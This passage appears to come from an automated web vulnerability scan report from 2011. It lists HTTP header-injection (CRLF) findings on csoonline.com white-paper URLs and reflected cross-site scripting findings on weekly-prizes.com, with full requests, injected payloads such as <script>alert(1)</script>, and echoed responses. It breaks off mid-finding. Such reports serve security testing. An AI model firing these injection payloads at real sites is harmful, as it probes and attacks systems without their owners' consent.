HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:46 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/662587/industry-concerned-about-dns-security-ready-to-act?4fa79
6bd39cacd16
=1
Content-Length: 153
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:26 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/662587/industry-concerned-about-dns-security-ready-to-act?4fa79
6bd39cacd16=1">here</a>

2.42. http://www.csoonline.com/white-paper/663955/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/663955/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b6f83%0d%0a860f19da41a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/663955/?b6f83%0d%0a860f19da41a=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:42 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/663955/email-protection-buyer-s-guide?b6f83
860f19da41a
=1
Content-Length: 133
Keep-Alive: timeout=5, max=5
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:22 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/663955/email-protection-buyer-s-guide?b6f83
860f19da41a=1">here</a>

2.43. http://www.csoonline.com/white-paper/663956/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/663956/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a913d%0d%0a6ec78982130 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/663956/?a913d%0d%0a6ec78982130=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:42 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/663956/anatomy-of-a-data-breach?a913d
6ec78982130
=1
Content-Length: 127
Keep-Alive: timeout=5, max=32
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:22 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/663956/anatomy-of-a-data-breach?a913d
6ec78982130=1">here</a>

2.44. http://www.csoonline.com/white-paper/664345/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/664345/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 90f3d%0d%0a920c4f9b092 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/664345/?90f3d%0d%0a920c4f9b092=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:41 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/664345/dnssec-is-a-reality?90f3d
920c4f9b092
=1
Content-Length: 122
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:21 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/664345/dnssec-is-a-reality?90f3d
920c4f9b092=1">here</a>

2.45. http://www.csoonline.com/white-paper/665713/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/665713/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f586d%0d%0a9fe4b6f852e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/665713/?f586d%0d%0a9fe4b6f852e=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:32 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/665713/security-2011-knowing-where-to-look?f586d
9fe4b6f852e
=1
Content-Length: 138
Keep-Alive: timeout=5, max=61
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:13 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/665713/security-2011-knowing-where-to-look?f586d
9fe4b6f852e=1">here</a>

2.46. http://www.csoonline.com/white-paper/666169/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/666169/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f19f4%0d%0af2feace3ab8 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/666169/?f19f4%0d%0af2feace3ab8=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:29 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/666169/cloud-computing-both-sides-now?f19f4
f2feace3ab8
=1
Content-Length: 133
Keep-Alive: timeout=5, max=2
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:10 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/666169/cloud-computing-both-sides-now?f19f4
f2feace3ab8=1">here</a>

2.47. http://www.csoonline.com/white-paper/666776/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/666776/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload aa51f%0d%0adefe5d70d0e was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/666776/?aa51f%0d%0adefe5d70d0e=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:29 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/666776/it-executive-guide-to-security-intelligence?aa51f
defe5d70d0e
=1
Content-Length: 146
Keep-Alive: timeout=5, max=1
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:10 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/666776/it-executive-guide-to-security-intelligence?aa51f
defe5d70d0e=1">here</a>

2.48. http://www.csoonline.com/white-paper/666777/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csoonline.com
Path:   /white-paper/666777/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e905c%0d%0a1f38cab7bb1 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /white-paper/666777/?e905c%0d%0a1f38cab7bb1=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:25 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/white-paper/666777/five-practical-steps-to-protecting-your-organization-against-breach?e905c
1f38cab7bb1
=1
Content-Length: 170
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:06 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/white-paper/666777/five-practical-steps-to-protecting-your-organization-against-breach?e905c
1f38cab7bb1=1">here</a>

3. Cross-site scripting (reflected)
There are 157 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



3.1. http://weekly-prizes.com/ [aff parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /

Issue detail

The value of the aff request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced24"><script>alert(1)</script>1330ed82d58 was submitted in the aff parameter. This input was echoed as ced24\"><script>alert(1)</script>1330ed82d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aff=154ced24"><script>alert(1)</script>1330ed82d58&subid=&pop=0&r=1&sound=1&sid=1001 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://ziggymedia.go2cloud.org/aff_r?offer_id=24&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:24:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11309

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<a href="http://zjmps.com/click/?a=154ced24\"><script>alert(1)</script>1330ed82d58&o=518&c1=&sid=1001" target="_blank">
...[SNIP]...

3.2. http://weekly-prizes.com/ [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baacb"><script>alert(1)</script>3387eee7817 was submitted in the sid parameter. This input was echoed as baacb\"><script>alert(1)</script>3387eee7817 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aff=154&subid=&pop=0&r=1&sound=1&sid=1001baacb"><script>alert(1)</script>3387eee7817 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://ziggymedia.go2cloud.org/aff_r?offer_id=24&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:24:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11309

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<a href="http://zjmps.com/click/?a=154&o=518&c1=&sid=1001baacb\"><script>alert(1)</script>3387eee7817" target="_blank">
...[SNIP]...

3.3. http://weekly-prizes.com/ [subid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /

Issue detail

The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a7a0"><script>alert(1)</script>fe3a725c195 was submitted in the subid parameter. This input was echoed as 9a7a0\"><script>alert(1)</script>fe3a725c195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aff=154&subid=9a7a0"><script>alert(1)</script>fe3a725c195&pop=0&r=1&sound=1&sid=1001 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://ziggymedia.go2cloud.org/aff_r?offer_id=24&aff_id=1001&url=http%3A%2F%2Fweekly-prizes.com%2F%3Faff%3D154%26subid%3D%26pop%3D0%26r%3D1%26sound%3D1%26sid%3D1001
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:24:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Connection: close
Content-Type: text/html
Content-Length: 11309

<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<link rel="Shortcut Icon" href="img/favicon.ico" type="image/x-icon" />
<title>You Are Today's Lucky Winner</title
...[SNIP]...
<a href="http://zjmps.com/click/?a=154&o=518&c1=9a7a0\"><script>alert(1)</script>fe3a725c195&sid=1001" target="_blank">
...[SNIP]...

3.4. http://weekly-prizes.com/1-frame.php [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /1-frame.php

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a0e8"><script>alert(1)</script>e4e5024fcd1 was submitted in the c parameter. This input was echoed as 5a0e8\"><script>alert(1)</script>e4e5024fcd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1-frame.php?subid=154&sid=&c=us5a0e8"><script>alert(1)</script>e4e5024fcd1&tt= HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:05 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7464
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://cdn.weekly-pr
...[SNIP]...
<input name="c" type="hidden" id="c" value="us5a0e8\"><script>alert(1)</script>e4e5024fcd1" />
...[SNIP]...

3.5. http://weekly-prizes.com/1-frame.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /1-frame.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f1cf"><script>alert(1)</script>4fecb2bd1c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f1cf\"><script>alert(1)</script>4fecb2bd1c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1-frame.php?subid=154&sid=&c=us/1f1cf"><script>alert(1)</script>4fecb2bd1c4&tt= HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7465
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://cdn.weekly-pr
...[SNIP]...
<input name="c" type="hidden" id="c" value="us/1f1cf\"><script>alert(1)</script>4fecb2bd1c4" />
...[SNIP]...

3.6. http://weekly-prizes.com/1-frame.php [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /1-frame.php

Issue detail

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbff3"><script>alert(1)</script>5e5ff89463a was submitted in the sid parameter. This input was echoed as fbff3\"><script>alert(1)</script>5e5ff89463a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1-frame.php?subid=154&sid=fbff3"><script>alert(1)</script>5e5ff89463a&c=us&tt= HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7464
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://cdn.weekly-pr
...[SNIP]...
<input name="sid" type="hidden" id="sid" value="fbff3\"><script>alert(1)</script>5e5ff89463a" />
...[SNIP]...

3.7. http://weekly-prizes.com/1-frame.php [subid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /1-frame.php

Issue detail

The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74452"><script>alert(1)</script>f2433208b93 was submitted in the subid parameter. This input was echoed as 74452\"><script>alert(1)</script>f2433208b93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1-frame.php?subid=15474452"><script>alert(1)</script>f2433208b93&sid=&c=us&tt= HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7464
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://cdn.weekly-pr
...[SNIP]...
<input name="subid" type="hidden" id="subid" value="15474452\"><script>alert(1)</script>f2433208b93" />
...[SNIP]...

3.8. http://weekly-prizes.com/1.php [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://weekly-prizes.com
Path:   /1.php

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 668af'><script>alert(1)</script>51f185bb0fc was submitted in the c parameter. This input was echoed as 668af\'><script>alert(1)</script>51f185bb0fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1.php?c=668af'><script>alert(1)</script>51f185bb0fc&subid=154 HTTP/1.1
Host: weekly-prizes.com
Proxy-Connection: keep-alive
Referer: http://zjmps.com/click/?a=154&o=518&c1=js_sound2909d\
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:04 GMT
